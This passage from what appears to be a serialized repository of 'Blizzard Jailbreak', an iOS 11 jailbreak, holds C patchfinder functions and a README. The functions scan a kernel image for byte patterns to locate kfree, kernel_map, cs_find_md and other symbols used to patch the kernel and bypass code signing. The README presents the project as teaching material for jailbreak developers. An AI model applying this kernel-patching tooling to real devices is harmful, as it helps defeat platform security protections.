kernel_slide;\n}\n\naddr_t Find_cs_blob_allocate_site() {\n \n uint32_t bytes[] = {\n 0xf9001ea8, // str x8, [x21, #0x38]\n 0xb9000ebf, // str wzr, [x21, #0xc]\n 0x3942a2a8, // ldrb 28, [x21, #0xa8]\n 0x121e1508, // and w8, w8, #0xfc\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n addr -= (uint64_t)Kernel;\n \n addr = Step64_back(Kernel, addr, 200, INSN_ADRP);\n if (!addr) {\n return 0;\n }\n \n addr = Calc64(Kernel, addr, addr + 8, 2);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kfree() {\n \n uint32_t bytes[] = {\n 0xf9001ea8, // str x8, [x21, #0x38]\n 0xb9000ebf, // str wzr, [x21, #0xc]\n 0x3942a2a8, // ldrb 28, [x21, #0xa8]\n 0x121e1508, // and w8, w8, #0xfc\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n addr -= (uint64_t)Kernel;\n \n addr = Step64(Kernel, addr, 200, INSN_CALL);\n if (!addr) {\n return 0;\n }\n \n addr += 4;\n \n addr = Step64(Kernel, addr, 200, INSN_CALL);\n if (!addr) {\n return 0;\n }\n \n addr = Follow_call64(Kernel, addr);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_cs_find_md() {\n \n uint32_t bytes[] = {\n 0xb9400008, // ldr w8, [x0]\n 0x529bdf49, // mov w9, #0xdefa\n 0x72a04189, // movk w9, #0x20c, lsl#16\n 0x6b09011f // cmp w8, w9\n };\n \n uint64_t addr = (uint64_t)Boyermoore_horspool_memmem((unsigned char *)((uint64_t)Kernel + XNUCore_Base), XNUCore_Size, (const unsigned char *)bytes, sizeof(bytes));\n if (!addr) {\n return 0;\n }\n \n addr -= (uint64_t)Kernel;\n \n uint64_t adrp = Step64(Kernel, addr, 200, INSN_ADRP);\n if (!adrp) {\n return 0;\n }\n \n adrp += 4;\n \n uint64_t adrp2 = Step64(Kernel, adrp, 200, INSN_ADRP);\n if (adrp2) {\n adrp = adrp2; // non-A12\n }\n \n addr = Calc64(Kernel, adrp - 4, adrp + 8, 9);\n if (!addr) {\n return 0;\n }\n \n return addr + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_memory_allocate() {\n uint64_t ref = Find_strref(\"\\\"kernel_memory_allocate: VM is not ready\\\"\", 1, 0, true);\n if (!ref) {\n return 0;\n }\n ref -= KernDumpBase;\n \n uint64_t func = BOF64(Kernel, XNUCore_Base, ref);\n if (!func) {\n return 0;\n }\n \n return func + KernDumpBase + kernel_slide;\n}\n\naddr_t Find_kernel_map() {\n uint64_t kalloc_canblock = Find_kalloc_canblock();\n if (!kalloc_canblock) {\n return 0;\n }\n kalloc_canblock -= (KernDumpBase + kernel_slide);\n \n uint64_t kern_alloc = Find_kernel_memory_allocate();\n if (!kern_alloc) {\n return 0;\n }\n kern_alloc -= (KernDumpBase + kernel_slide);\n \n uint64_t val = 0;\n uint64_t func = kalloc_canblock;\n \n for (int i = 0; i < 5; i++) {\n func = Step64(Kernel, func + 4, 4*80, INSN_CALL);\n \n if (Follow_call64(Kernel, func) == kern_alloc) {\n val = Calc64(Kernel, kalloc_canblock, func, 10);\n break;\n }\n }\n \n if (!val) {\n return 0;\n }\n \n return val + KernDumpBase + kernel_slide;\n}\n" }, { "path": "README.md", "content": "# Blizzard Jailbreak\nAn Open-Source iOS 11.0 to 11.4.1 Jailbreak. \n\nThis jailbreak is aimed at the beginner Jailbreak Developers who want to learn how to build iOS Jailbreaks.\nThe code is kept simple with only the necessary components being added, while keeping a functional jailbreak.\n\n### NOT SUITABLE FOR PUBLIC USE RIGHT NOW! WAIT FOR ME TO FINISH IT!\n\n### Part of my OpenJailbreak Project.\n\nFeel free to mess with the code as long as you do proper crediting where it is due.\n\n### Speaking of credits\nSpecial thanks to the following developers. Their work is used in this project:\n* Jake James\n* Pwn20wnd\n* Electra Team\n\n### Find Me on Social Media:\n* GeoSn0w (Personal Dev Account)\n* Blizzard Jailbreak\n* iDevice Central YouTube Channel\n\n### My Websites\n* Latest iOS 16 Jailbreak News\n* Latest Gaming News & Guides\n* iOS Jailbreak Forum\n* Latest FRP Bypass Tools & Guides\n" }, { "path": "Vanity/readme.md", "content": "This folder contains the logo, wallpapers and other press kits.\n" } ]